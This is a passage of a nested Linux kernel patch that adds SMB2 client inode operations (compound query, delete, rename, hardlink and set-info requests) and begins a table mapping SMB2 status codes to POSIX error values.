++		rqst[num_rqst].rq_iov = &vars->si_iov[0];
++		rqst[num_rqst].rq_nvec = 2;
++
++		len = (2 * UniStrnlen((wchar_t *)ptr, PATH_MAX));
++
++		vars->link_info.ReplaceIfExists = 0;
++		vars->link_info.RootDirectory = 0;
++		vars->link_info.FileNameLength = cpu_to_le32(len);
++
++		size[0] = sizeof(struct smb2_file_link_info);
++		data[0] = &vars->link_info;
++
++		size[1] = len + 2 /* null */;
++		data[1] = (__le16 *)ptr;
++
++		rc = SMB2_set_info_init(tcon, server,
++					&rqst[num_rqst], COMPOUND_FID,
++					COMPOUND_FID, current->tgid,
++					FILE_LINK_INFORMATION,
++					SMB2_O_INFO_FILE, 0, data, size);
++		if (rc)
++			goto finished;
++		smb2_set_next_command(tcon, &rqst[num_rqst]);
++		smb2_set_related(&rqst[num_rqst++]);
++		trace_smb3_hardlink_enter(xid, ses->Suid, tcon->tid, full_path);
++		break;
++	default:
++		cifs_dbg(VFS, "Invalid command\n");
++		rc = -EINVAL;
++	}
++	if (rc)
++		goto finished;
++
++	/* We already have a handle so we can skip the close */
++	if (cfile)
++		goto after_close;
++	/* Close */
++	flags |= CIFS_CP_CREATE_CLOSE_OP;
++	rqst[num_rqst].rq_iov = &vars->close_iov[0];
++	rqst[num_rqst].rq_nvec = 1;
++	rc = SMB2_close_init(tcon, server,
++			     &rqst[num_rqst], COMPOUND_FID,
++			     COMPOUND_FID, false);
++	smb2_set_related(&rqst[num_rqst]);
++	if (rc)
++		goto finished;
++ after_close:
++	num_rqst++;
++
++	if (cfile) {
++		rc = compound_send_recv(xid, ses, server,
++					flags, num_rqst - 2,
++					&rqst[1], &resp_buftype[1],
++					&rsp_iov[1]);
++	} else
++		rc = compound_send_recv(xid, ses, server,
++					flags, num_rqst,
++					rqst, resp_buftype,
++					rsp_iov);
++
++ finished:
++	if (cfile)
++		cifsFileInfo_put(cfile);
++
++	SMB2_open_free(&rqst[0]);
++	if (rc == -EREMCHG) {
++		pr_warn_once("server share %s deleted\n", tcon->tree_name);
++		tcon->need_reconnect = true;
++	}
++
++	switch (command) {
++	case SMB2_OP_QUERY_INFO:
++		idata = ptr;
++		if (rc == 0 && cfile && cfile->symlink_target) {
++			idata->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++			if (!idata->symlink_target)
++				rc = -ENOMEM;
++		}
++		if (rc == 0) {
++			qi_rsp = (struct smb2_query_info_rsp *)
++				rsp_iov[1].iov_base;
++			rc = smb2_validate_and_copy_iov(
++				le16_to_cpu(qi_rsp->OutputBufferOffset),
++				le32_to_cpu(qi_rsp->OutputBufferLength),
++				&rsp_iov[1], sizeof(idata->fi), (char *)&idata->fi);
++		}
++		if (rqst[1].rq_iov)
++			SMB2_query_info_free(&rqst[1]);
++		if (rqst[2].rq_iov)
++			SMB2_close_free(&rqst[2]);
++		if (rc)
++			trace_smb3_query_info_compound_err(xid,  ses->Suid,
++						tcon->tid, rc);
++		else
++			trace_smb3_query_info_compound_done(xid, ses->Suid,
++						tcon->tid);
++		break;
++	case SMB2_OP_POSIX_QUERY_INFO:
++		idata = ptr;
++		if (rc == 0 && cfile && cfile->symlink_target) {
++			idata->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
++			if (!idata->symlink_target)
++				rc = -ENOMEM;
++		}
++		if (rc == 0) {
++			qi_rsp = (struct smb2_query_info_rsp *)
++				rsp_iov[1].iov_base;
++			rc = smb2_validate_and_copy_iov(
++				le16_to_cpu(qi_rsp->OutputBufferOffset),
++				le32_to_cpu(qi_rsp->OutputBufferLength),
++				&rsp_iov[1], sizeof(idata->posix_fi) /* add SIDs */,
++				(char *)&idata->posix_fi);
++		}
++		if (rqst[1].rq_iov)
++			SMB2_query_info_free(&rqst[1]);
++		if (rqst[2].rq_iov)
++			SMB2_close_free(&rqst[2]);
++		if (rc)
++			trace_smb3_posix_query_info_compound_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_posix_query_info_compound_done(xid, ses->Suid, tcon->tid);
++		break;
++	case SMB2_OP_DELETE:
++		if (rc)
++			trace_smb3_delete_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_delete_done(xid, ses->Suid, tcon->tid);
++		if (rqst[1].rq_iov)
++			SMB2_close_free(&rqst[1]);
++		break;
++	case SMB2_OP_MKDIR:
++		if (rc)
++			trace_smb3_mkdir_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_mkdir_done(xid, ses->Suid, tcon->tid);
++		if (rqst[1].rq_iov)
++			SMB2_close_free(&rqst[1]);
++		break;
++	case SMB2_OP_HARDLINK:
++		if (rc)
++			trace_smb3_hardlink_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_hardlink_done(xid, ses->Suid, tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	case SMB2_OP_RENAME:
++		if (rc)
++			trace_smb3_rename_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_rename_done(xid, ses->Suid, tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	case SMB2_OP_RMDIR:
++		if (rc)
++			trace_smb3_rmdir_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_rmdir_done(xid, ses->Suid, tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	case SMB2_OP_SET_EOF:
++		if (rc)
++			trace_smb3_set_eof_err(xid,  ses->Suid, tcon->tid, rc);
++		else
++			trace_smb3_set_eof_done(xid, ses->Suid, tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	case SMB2_OP_SET_INFO:
++		if (rc)
++			trace_smb3_set_info_compound_err(xid,  ses->Suid,
++						tcon->tid, rc);
++		else
++			trace_smb3_set_info_compound_done(xid, ses->Suid,
++						tcon->tid);
++		free_set_inf_compound(rqst);
++		break;
++	}
++
++	if (rc && err_iov && err_buftype) {
++		memcpy(err_iov, rsp_iov, 3 * sizeof(*err_iov));
++		memcpy(err_buftype, resp_buftype, 3 * sizeof(*err_buftype));
++	} else {
++		free_rsp_buf(resp_buftype[0], rsp_iov[0].iov_base);
++		free_rsp_buf(resp_buftype[1], rsp_iov[1].iov_base);
++		free_rsp_buf(resp_buftype[2], rsp_iov[2].iov_base);
++	}
++	kfree(vars);
++	return rc;
++}
++
++int smb2_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++			 struct cifs_sb_info *cifs_sb, const char *full_path,
++			 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
++{
++	__u32 create_options = 0;
++	struct cifsFileInfo *cfile;
++	struct cached_fid *cfid = NULL;
++	struct kvec err_iov[3] = {};
++	int err_buftype[3] = {};
++	bool islink;
++	int rc, rc2;
++
++	*adjust_tz = false;
++	*reparse = false;
++
++	if (strcmp(full_path, ""))
++		rc = -ENOENT;
++	else
++		rc = open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
++	/* If it is a root and its handle is cached then use it */
++	if (!rc) {
++		if (cfid->file_all_info_is_valid) {
++			memcpy(&data->fi, &cfid->file_all_info, sizeof(data->fi));
++		} else {
++			rc = SMB2_query_info(xid, tcon, cfid->fid.persistent_fid,
++					     cfid->fid.volatile_fid, &data->fi);
++		}
++		close_cached_dir(cfid);
++		return rc;
++	}
++
++	cifs_get_readable_path(tcon, full_path, &cfile);
++	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
++			      create_options, ACL_NO_MODE, data, SMB2_OP_QUERY_INFO, cfile,
++			      err_iov, err_buftype);
++	if (rc) {
++		struct smb2_hdr *hdr = err_iov[0].iov_base;
++
++		if (unlikely(!hdr || err_buftype[0] == CIFS_NO_BUFFER))
++			goto out;
++		if (rc == -EOPNOTSUPP && hdr->Command == SMB2_CREATE &&
++		    hdr->Status == STATUS_STOPPED_ON_SYMLINK) {
++			rc = smb2_parse_symlink_response(cifs_sb, err_iov,
++							 &data->symlink_target);
++			if (rc)
++				goto out;
++
++			*reparse = true;
++			create_options |= OPEN_REPARSE_POINT;
++
++			/* Failed on a symbolic link - query a reparse point info */
++			cifs_get_readable_path(tcon, full_path, &cfile);
++			rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
++					      FILE_READ_ATTRIBUTES, FILE_OPEN,
++					      create_options, ACL_NO_MODE, data,
++					      SMB2_OP_QUERY_INFO, cfile, NULL, NULL);
++			goto out;
++		} else if (rc != -EREMOTE && hdr->Status == STATUS_OBJECT_NAME_INVALID) {
++			rc2 = cifs_inval_name_dfs_link_error(xid, tcon, cifs_sb,
++							     full_path, &islink);
++			if (rc2) {
++				rc = rc2;
++				goto out;
++			}
++			if (islink)
++				rc = -EREMOTE;
++		}
++		if (rc == -EREMOTE && IS_ENABLED(CONFIG_CIFS_DFS_UPCALL) && cifs_sb &&
++		    (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS))
++			rc = -EOPNOTSUPP;
++	}
++
++out:
++	free_rsp_buf(err_buftype[0], err_iov[0].iov_base);
++	free_rsp_buf(err_buftype[1], err_iov[1].iov_base);
++	free_rsp_buf(err_buftype[2], err_iov[2].iov_base);
++	return rc;
++}
++
++
++int smb311_posix_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
++				 struct cifs_sb_info *cifs_sb, const char *full_path,
++				 struct cifs_open_info_data *data, bool *adjust_tz, bool *reparse)
++{
++	int rc;
++	__u32 create_options = 0;
++	struct cifsFileInfo *cfile;
++	struct kvec err_iov[3] = {};
++	int err_buftype[3] = {};
++
++	*adjust_tz = false;
++	*reparse = false;
++
++	/*
++	 * BB TODO: Add support for using the cached root handle.
++	 * Create SMB2_query_posix_info worker function to do non-compounded query
++	 * when we already have an open file handle for this. For now this is fast enough
++	 * (always using the compounded version).
++	 */
++
++	cifs_get_readable_path(tcon, full_path, &cfile);
++	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES, FILE_OPEN,
++			      create_options, ACL_NO_MODE, data, SMB2_OP_POSIX_QUERY_INFO, cfile,
++			      err_iov, err_buftype);
++	if (rc == -EOPNOTSUPP) {
++		/* BB TODO: When support for special files added to Samba re-verify this path */
++		if (err_iov[0].iov_base && err_buftype[0] != CIFS_NO_BUFFER &&
++		    ((struct smb2_hdr *)err_iov[0].iov_base)->Command == SMB2_CREATE &&
++		    ((struct smb2_hdr *)err_iov[0].iov_base)->Status == STATUS_STOPPED_ON_SYMLINK) {
++			rc = smb2_parse_symlink_response(cifs_sb, err_iov, &data->symlink_target);
++			if (rc)
++				goto out;
++		}
++		*reparse = true;
++		create_options |= OPEN_REPARSE_POINT;
++
++		/* Failed on a symbolic link - query a reparse point info */
++		cifs_get_readable_path(tcon, full_path, &cfile);
++		rc = smb2_compound_op(xid, tcon, cifs_sb, full_path, FILE_READ_ATTRIBUTES,
++				      FILE_OPEN, create_options, ACL_NO_MODE, data,
++				      SMB2_OP_POSIX_QUERY_INFO, cfile, NULL, NULL);
++	}
++
++out:
++	free_rsp_buf(err_buftype[0], err_iov[0].iov_base);
++	free_rsp_buf(err_buftype[1], err_iov[1].iov_base);
++	free_rsp_buf(err_buftype[2], err_iov[2].iov_base);
++	return rc;
++}
++
++int
++smb2_mkdir(const unsigned int xid, struct inode *parent_inode, umode_t mode,
++	   struct cifs_tcon *tcon, const char *name,
++	   struct cifs_sb_info *cifs_sb)
++{
++	return smb2_compound_op(xid, tcon, cifs_sb, name,
++				FILE_WRITE_ATTRIBUTES, FILE_CREATE,
++				CREATE_NOT_FILE, mode, NULL, SMB2_OP_MKDIR,
++				NULL, NULL, NULL);
++}
++
++void
++smb2_mkdir_setinfo(struct inode *inode, const char *name,
++		   struct cifs_sb_info *cifs_sb, struct cifs_tcon *tcon,
++		   const unsigned int xid)
++{
++	FILE_BASIC_INFO data;
++	struct cifsInodeInfo *cifs_i;
++	struct cifsFileInfo *cfile;
++	u32 dosattrs;
++	int tmprc;
++
++	memset(&data, 0, sizeof(data));
++	cifs_i = CIFS_I(inode);
++	dosattrs = cifs_i->cifsAttrs | ATTR_READONLY;
++	data.Attributes = cpu_to_le32(dosattrs);
++	cifs_get_writable_path(tcon, name, FIND_WR_ANY, &cfile);
++	tmprc = smb2_compound_op(xid, tcon, cifs_sb, name,
++				 FILE_WRITE_ATTRIBUTES, FILE_CREATE,
++				 CREATE_NOT_FILE, ACL_NO_MODE,
++				 &data, SMB2_OP_SET_INFO, cfile, NULL, NULL);
++	if (tmprc == 0)
++		cifs_i->cifsAttrs = dosattrs;
++}
++
++int
++smb2_rmdir(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
++	   struct cifs_sb_info *cifs_sb)
++{
++	drop_cached_dir_by_name(xid, tcon, name, cifs_sb);
++	return smb2_compound_op(xid, tcon, cifs_sb, name, DELETE, FILE_OPEN,
++				CREATE_NOT_FILE, ACL_NO_MODE,
++				NULL, SMB2_OP_RMDIR, NULL, NULL, NULL);
++}
++
++int
++smb2_unlink(const unsigned int xid, struct cifs_tcon *tcon, const char *name,
++	    struct cifs_sb_info *cifs_sb)
++{
++	return smb2_compound_op(xid, tcon, cifs_sb, name, DELETE, FILE_OPEN,
++				CREATE_DELETE_ON_CLOSE | OPEN_REPARSE_POINT,
++				ACL_NO_MODE, NULL, SMB2_OP_DELETE, NULL, NULL, NULL);
++}
++
++static int
++smb2_set_path_attr(const unsigned int xid, struct cifs_tcon *tcon,
++		   const char *from_name, const char *to_name,
++		   struct cifs_sb_info *cifs_sb, __u32 access, int command,
++		   struct cifsFileInfo *cfile)
++{
++	__le16 *smb2_to_name = NULL;
++	int rc;
++
++	smb2_to_name = cifs_convert_path_to_utf16(to_name, cifs_sb);
++	if (smb2_to_name == NULL) {
++		rc = -ENOMEM;
++		goto smb2_rename_path;
++	}
++	rc = smb2_compound_op(xid, tcon, cifs_sb, from_name, access,
++			      FILE_OPEN, 0, ACL_NO_MODE, smb2_to_name,
++			      command, cfile, NULL, NULL);
++smb2_rename_path:
++	kfree(smb2_to_name);
++	return rc;
++}
++
++int
++smb2_rename_path(const unsigned int xid, struct cifs_tcon *tcon,
++		 const char *from_name, const char *to_name,
++		 struct cifs_sb_info *cifs_sb)
++{
++	struct cifsFileInfo *cfile;
++
++	drop_cached_dir_by_name(xid, tcon, from_name, cifs_sb);
++	cifs_get_writable_path(tcon, from_name, FIND_WR_WITH_DELETE, &cfile);
++
++	return smb2_set_path_attr(xid, tcon, from_name, to_name,
++				  cifs_sb, DELETE, SMB2_OP_RENAME, cfile);
++}
++
++int
++smb2_create_hardlink(const unsigned int xid, struct cifs_tcon *tcon,
++		     const char *from_name, const char *to_name,
++		     struct cifs_sb_info *cifs_sb)
++{
++	return smb2_set_path_attr(xid, tcon, from_name, to_name, cifs_sb,
++				  FILE_READ_ATTRIBUTES, SMB2_OP_HARDLINK,
++				  NULL);
++}
++
++int
++smb2_set_path_size(const unsigned int xid, struct cifs_tcon *tcon,
++		   const char *full_path, __u64 size,
++		   struct cifs_sb_info *cifs_sb, bool set_alloc)
++{
++	__le64 eof = cpu_to_le64(size);
++	struct cifsFileInfo *cfile;
++
++	cifs_get_writable_path(tcon, full_path, FIND_WR_ANY, &cfile);
++	return smb2_compound_op(xid, tcon, cifs_sb, full_path,
++				FILE_WRITE_DATA, FILE_OPEN, 0, ACL_NO_MODE,
++				&eof, SMB2_OP_SET_EOF, cfile, NULL, NULL);
++}
++
++int
++smb2_set_file_info(struct inode *inode, const char *full_path,
++		   FILE_BASIC_INFO *buf, const unsigned int xid)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cfile;
++	int rc;
++
++	if ((buf->CreationTime == 0) && (buf->LastAccessTime == 0) &&
++	    (buf->LastWriteTime == 0) && (buf->ChangeTime == 0) &&
++	    (buf->Attributes == 0))
++		return 0; /* would be a no op, no sense sending this */
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	cifs_get_writable_path(tcon, full_path, FIND_WR_ANY, &cfile);
++	rc = smb2_compound_op(xid, tcon, cifs_sb, full_path,
++			      FILE_WRITE_ATTRIBUTES, FILE_OPEN,
++			      0, ACL_NO_MODE, buf, SMB2_OP_SET_INFO, cfile,
++			      NULL, NULL);
++	cifs_put_tlink(tlink);
++	return rc;
++}
+diff --git a/fs/smb/client/smb2maperror.c b/fs/smb/client/smb2maperror.c
+new file mode 100644
+index 0000000000000..194799ddd3828
+--- /dev/null
++++ b/fs/smb/client/smb2maperror.c
+@@ -0,0 +1,2481 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Functions which do error mapping of SMB2 status codes to POSIX errors
++ *
++ *   Copyright (C) International Business Machines  Corp., 2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++#include <linux/errno.h>
++#include "cifsglob.h"
++#include "cifs_debug.h"
++#include "smb2pdu.h"
++#include "smb2proto.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++#include "trace.h"
++
++struct status_to_posix_error {
++	__le32 smb2_status;
++	int posix_error;
++	char *status_string;
++};
++
++static const struct status_to_posix_error smb2_error_map_table[] = {
++	{STATUS_SUCCESS, 0, "STATUS_SUCCESS"},
++	{STATUS_WAIT_0,  0, "STATUS_WAIT_0"},
++	{STATUS_WAIT_1, -EIO, "STATUS_WAIT_1"},
++	{STATUS_WAIT_2, -EIO, "STATUS_WAIT_2"},
++	{STATUS_WAIT_3, -EIO, "STATUS_WAIT_3"},
++	{STATUS_WAIT_63, -EIO, "STATUS_WAIT_63"},
++	{STATUS_ABANDONED, -EIO, "STATUS_ABANDONED"},
++	{STATUS_ABANDONED_WAIT_0, -EIO, "STATUS_ABANDONED_WAIT_0"},
++	{STATUS_ABANDONED_WAIT_63, -EIO, "STATUS_ABANDONED_WAIT_63"},
++	{STATUS_USER_APC, -EIO, "STATUS_USER_APC"},
++	{STATUS_KERNEL_APC, -EIO, "STATUS_KERNEL_APC"},
++	{STATUS_ALERTED, -EIO, "STATUS_ALERTED"},
++	{STATUS_TIMEOUT, -ETIMEDOUT, "STATUS_TIMEOUT"},
++	{STATUS_PENDING, -EIO, "STATUS_PENDING"},
++	{STATUS_REPARSE, -EIO, "STATUS_REPARSE"},
++	{STATUS_MORE_ENTRIES, -EIO, "STATUS_MORE_ENTRIES"},
++	{STATUS_NOT_ALL_ASSIGNED, -EIO, "STATUS_NOT_ALL_ASSIGNED"},
++	{STATUS_SOME_NOT_MAPPED, -EIO, "STATUS_SOME_NOT_MAPPED"},
++	{STATUS_OPLOCK_BREAK_IN_PROGRESS, -EIO,
++	"STATUS_OPLOCK_BREAK_IN_PROGRESS"},
++	{STATUS_VOLUME_MOUNTED, -EIO, "STATUS_VOLUME_MOUNTED"},
++	{STATUS_RXACT_COMMITTED, -EIO, "STATUS_RXACT_COMMITTED"},
++	{STATUS_NOTIFY_CLEANUP, -EIO, "STATUS_NOTIFY_CLEANUP"},
++	{STATUS_NOTIFY_ENUM_DIR, -EIO, "STATUS_NOTIFY_ENUM_DIR"},
++	{STATUS_NO_QUOTAS_FOR_ACCOUNT, -EIO, "STATUS_NO_QUOTAS_FOR_ACCOUNT"},
++	{STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED, -EIO,
++	"STATUS_PRIMARY_TRANSPORT_CONNECT_FAILED"},
++	{STATUS_PAGE_FAULT_TRANSITION, -EIO, "STATUS_PAGE_FAULT_TRANSITION"},
++	{STATUS_PAGE_FAULT_DEMAND_ZERO, -EIO, "STATUS_PAGE_FAULT_DEMAND_ZERO"},
++	{STATUS_PAGE_FAULT_COPY_ON_WRITE, -EIO,
++	"STATUS_PAGE_FAULT_COPY_ON_WRITE"},
++	{STATUS_PAGE_FAULT_GUARD_PAGE, -EIO, "STATUS_PAGE_FAULT_GUARD_PAGE"},
++	{STATUS_PAGE_FAULT_PAGING_FILE, -EIO, "STATUS_PAGE_FAULT_PAGING_FILE"},
++	{STATUS_CACHE_PAGE_LOCKED, -EIO, "STATUS_CACHE_PAGE_LOCKED"},
++	{STATUS_CRASH_DUMP, -EIO, "STATUS_CRASH_DUMP"},
++	{STATUS_BUFFER_ALL_ZEROS, -EIO, "STATUS_BUFFER_ALL_ZEROS"},
++	{STATUS_REPARSE_OBJECT, -EIO, "STATUS_REPARSE_OBJECT"},
++	{STATUS_RESOURCE_REQUIREMENTS_CHANGED, -EIO,
++	"STATUS_RESOURCE_REQUIREMENTS_CHANGED"},
++	{STATUS_TRANSLATION_COMPLETE, -EIO, "STATUS_TRANSLATION_COMPLETE"},
++	{STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY, -EIO,
++	"STATUS_DS_MEMBERSHIP_EVALUATED_LOCALLY"},
++	{STATUS_NOTHING_TO_TERMINATE, -EIO, "STATUS_NOTHING_TO_TERMINATE"},
++	{STATUS_PROCESS_NOT_IN_JOB, -EIO, "STATUS_PROCESS_NOT_IN_JOB"},
++	{STATUS_PROCESS_IN_JOB, -EIO, "STATUS_PROCESS_IN_JOB"},
++	{STATUS_VOLSNAP_HIBERNATE_READY, -EIO,
++	"STATUS_VOLSNAP_HIBERNATE_READY"},
++	{STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY, -EIO,
++	"STATUS_FSFILTER_OP_COMPLETED_SUCCESSFULLY"},
++	{STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED, -EIO,
++	"STATUS_INTERRUPT_VECTOR_ALREADY_CONNECTED"},
++	{STATUS_INTERRUPT_STILL_CONNECTED, -EIO,
++	"STATUS_INTERRUPT_STILL_CONNECTED"},
++	{STATUS_PROCESS_CLONED, -EIO, "STATUS_PROCESS_CLONED"},
++	{STATUS_FILE_LOCKED_WITH_ONLY_READERS, -EIO,
++	"STATUS_FILE_LOCKED_WITH_ONLY_READERS"},
++	{STATUS_FILE_LOCKED_WITH_WRITERS, -EIO,
++	"STATUS_FILE_LOCKED_WITH_WRITERS"},
++	{STATUS_RESOURCEMANAGER_READ_ONLY, -EROFS,
++	"STATUS_RESOURCEMANAGER_READ_ONLY"},
++	{STATUS_WAIT_FOR_OPLOCK, -EIO, "STATUS_WAIT_FOR_OPLOCK"},
++	{DBG_EXCEPTION_HANDLED, -EIO, "DBG_EXCEPTION_HANDLED"},
++	{DBG_CONTINUE, -EIO, "DBG_CONTINUE"},
++	{STATUS_FLT_IO_COMPLETE, -EIO, "STATUS_FLT_IO_COMPLETE"},
++	{STATUS_OBJECT_NAME_EXISTS, -EIO, "STATUS_OBJECT_NAME_EXISTS"},
++	{STATUS_THREAD_WAS_SUSPENDED, -EIO, "STATUS_THREAD_WAS_SUSPENDED"},
++	{STATUS_WORKING_SET_LIMIT_RANGE, -EIO,
++	"STATUS_WORKING_SET_LIMIT_RANGE"},
++	{STATUS_IMAGE_NOT_AT_BASE, -EIO, "STATUS_IMAGE_NOT_AT_BASE"},
++	{STATUS_RXACT_STATE_CREATED, -EIO, "STATUS_RXACT_STATE_CREATED"},
++	{STATUS_SEGMENT_NOTIFICATION, -EIO, "STATUS_SEGMENT_NOTIFICATION"},
++	{STATUS_LOCAL_USER_SESSION_KEY, -EIO, "STATUS_LOCAL_USER_SESSION_KEY"},
++	{STATUS_BAD_CURRENT_DIRECTORY, -EIO, "STATUS_BAD_CURRENT_DIRECTORY"},
++	{STATUS_SERIAL_MORE_WRITES, -EIO, "STATUS_SERIAL_MORE_WRITES"},
++	{STATUS_REGISTRY_RECOVERED, -EIO, "STATUS_REGISTRY_RECOVERED"},
++	{STATUS_FT_READ_RECOVERY_FROM_BACKUP, -EIO,
++	"STATUS_FT_READ_RECOVERY_FROM_BACKUP"},
++	{STATUS_FT_WRITE_RECOVERY, -EIO, "STATUS_FT_WRITE_RECOVERY"},
++	{STATUS_SERIAL_COUNTER_TIMEOUT, -ETIMEDOUT,
++	"STATUS_SERIAL_COUNTER_TIMEOUT"},
++	{STATUS_NULL_LM_PASSWORD, -EIO, "STATUS_NULL_LM_PASSWORD"},
++	{STATUS_IMAGE_MACHINE_TYPE_MISMATCH, -EIO,
++	"STATUS_IMAGE_MACHINE_TYPE_MISMATCH"},
++	{STATUS_RECEIVE_PARTIAL, -EIO, "STATUS_RECEIVE_PARTIAL"},
++	{STATUS_RECEIVE_EXPEDITED, -EIO, "STATUS_RECEIVE_EXPEDITED"},
++	{STATUS_RECEIVE_PARTIAL_EXPEDITED, -EIO,
++	"STATUS_RECEIVE_PARTIAL_EXPEDITED"},
++	{STATUS_EVENT_DONE, -EIO, "STATUS_EVENT_DONE"},
++	{STATUS_EVENT_PENDING, -EIO, "STATUS_EVENT_PENDING"},
++	{STATUS_CHECKING_FILE_SYSTEM, -EIO, "STATUS_CHECKING_FILE_SYSTEM"},
++	{STATUS_FATAL_APP_EXIT, -EIO, "STATUS_FATAL_APP_EXIT"},
++	{STATUS_PREDEFINED_HANDLE, -EIO, "STATUS_PREDEFINED_HANDLE"},
++	{STATUS_WAS_UNLOCKED, -EIO, "STATUS_WAS_UNLOCKED"},
++	{STATUS_SERVICE_NOTIFICATION, -EIO, "STATUS_SERVICE_NOTIFICATION"},
++	{STATUS_WAS_LOCKED, -EIO, "STATUS_WAS_LOCKED"},
++	{STATUS_LOG_HARD_ERROR, -EIO, "STATUS_LOG_HARD_ERROR"},
++	{STATUS_ALREADY_WIN32, -EIO, "STATUS_ALREADY_WIN32"},
++	{STATUS_WX86_UNSIMULATE, -EIO, "STATUS_WX86_UNSIMULATE"},
++	{STATUS_WX86_CONTINUE, -EIO, "STATUS_WX86_CONTINUE"},
++	{STATUS_WX86_SINGLE_STEP, -EIO, "STATUS_WX86_SINGLE_STEP"},
++	{STATUS_WX86_BREAKPOINT, -EIO, "STATUS_WX86_BREAKPOINT"},
++	{STATUS_WX86_EXCEPTION_CONTINUE, -EIO,
++	"STATUS_WX86_EXCEPTION_CONTINUE"},
++	{STATUS_WX86_EXCEPTION_LASTCHANCE, -EIO,
++	"STATUS_WX86_EXCEPTION_LASTCHANCE"},
++	{STATUS_WX86_EXCEPTION_CHAIN, -EIO, "STATUS_WX86_EXCEPTION_CHAIN"},
++	{STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE, -EIO,
++	"STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE"},
++	{STATUS_NO_YIELD_PERFORMED, -EIO, "STATUS_NO_YIELD_PERFORMED"},
++	{STATUS_TIMER_RESUME_IGNORED, -EIO, "STATUS_TIMER_RESUME_IGNORED"},
++	{STATUS_ARBITRATION_UNHANDLED, -EIO, "STATUS_ARBITRATION_UNHANDLED"},
++	{STATUS_CARDBUS_NOT_SUPPORTED, -ENOSYS, "STATUS_CARDBUS_NOT_SUPPORTED"},
++	{STATUS_WX86_CREATEWX86TIB, -EIO, "STATUS_WX86_CREATEWX86TIB"},
++	{STATUS_MP_PROCESSOR_MISMATCH, -EIO, "STATUS_MP_PROCESSOR_MISMATCH"},
++	{STATUS_HIBERNATED, -EIO, "STATUS_HIBERNATED"},
++	{STATUS_RESUME_HIBERNATION, -EIO, "STATUS_RESUME_HIBERNATION"},
++	{STATUS_FIRMWARE_UPDATED, -EIO, "STATUS_FIRMWARE_UPDATED"},
++	{STATUS_DRIVERS_LEAKING_LOCKED_PAGES, -EIO,
++	"STATUS_DRIVERS_LEAKING_LOCKED_PAGES"},
++	{STATUS_MESSAGE_RETRIEVED, -EIO, "STATUS_MESSAGE_RETRIEVED"},
++	{STATUS_SYSTEM_POWERSTATE_TRANSITION, -EIO,
++	"STATUS_SYSTEM_POWERSTATE_TRANSITION"},
++	{STATUS_ALPC_CHECK_COMPLETION_LIST, -EIO,
++	"STATUS_ALPC_CHECK_COMPLETION_LIST"},
++	{STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION, -EIO,
++	"STATUS_SYSTEM_POWERSTATE_COMPLEX_TRANSITION"},
++	{STATUS_ACCESS_AUDIT_BY_POLICY, -EIO, "STATUS_ACCESS_AUDIT_BY_POLICY"},
++	{STATUS_ABANDON_HIBERFILE, -EIO, "STATUS_ABANDON_HIBERFILE"},
++	{STATUS_BIZRULES_NOT_ENABLED, -EIO, "STATUS_BIZRULES_NOT_ENABLED"},
++	{STATUS_WAKE_SYSTEM, -EIO, "STATUS_WAKE_SYSTEM"},
++	{STATUS_DS_SHUTTING_DOWN, -EIO, "STATUS_DS_SHUTTING_DOWN"},
++	{DBG_REPLY_LATER, -EIO, "DBG_REPLY_LATER"},
++	{DBG_UNABLE_TO_PROVIDE_HANDLE, -EIO, "DBG_UNABLE_TO_PROVIDE_HANDLE"},
++	{DBG_TERMINATE_THREAD, -EIO, "DBG_TERMINATE_THREAD"},
++	{DBG_TERMINATE_PROCESS, -EIO, "DBG_TERMINATE_PROCESS"},
++	{DBG_CONTROL_C, -EIO, "DBG_CONTROL_C"},
++	{DBG_PRINTEXCEPTION_C, -EIO, "DBG_PRINTEXCEPTION_C"},
++	{DBG_RIPEXCEPTION, -EIO, "DBG_RIPEXCEPTION"},
++	{DBG_CONTROL_BREAK, -EIO, "DBG_CONTROL_BREAK"},
++	{DBG_COMMAND_EXCEPTION, -EIO, "DBG_COMMAND_EXCEPTION"},
++	{RPC_NT_UUID_LOCAL_ONLY, -EIO, "RPC_NT_UUID_LOCAL_ONLY"},
++	{RPC_NT_SEND_INCOMPLETE, -EIO, "RPC_NT_SEND_INCOMPLETE"},
++	{STATUS_CTX_CDM_CONNECT, -EIO, "STATUS_CTX_CDM_CONNECT"},
++	{STATUS_CTX_CDM_DISCONNECT, -EIO, "STATUS_CTX_CDM_DISCONNECT"},
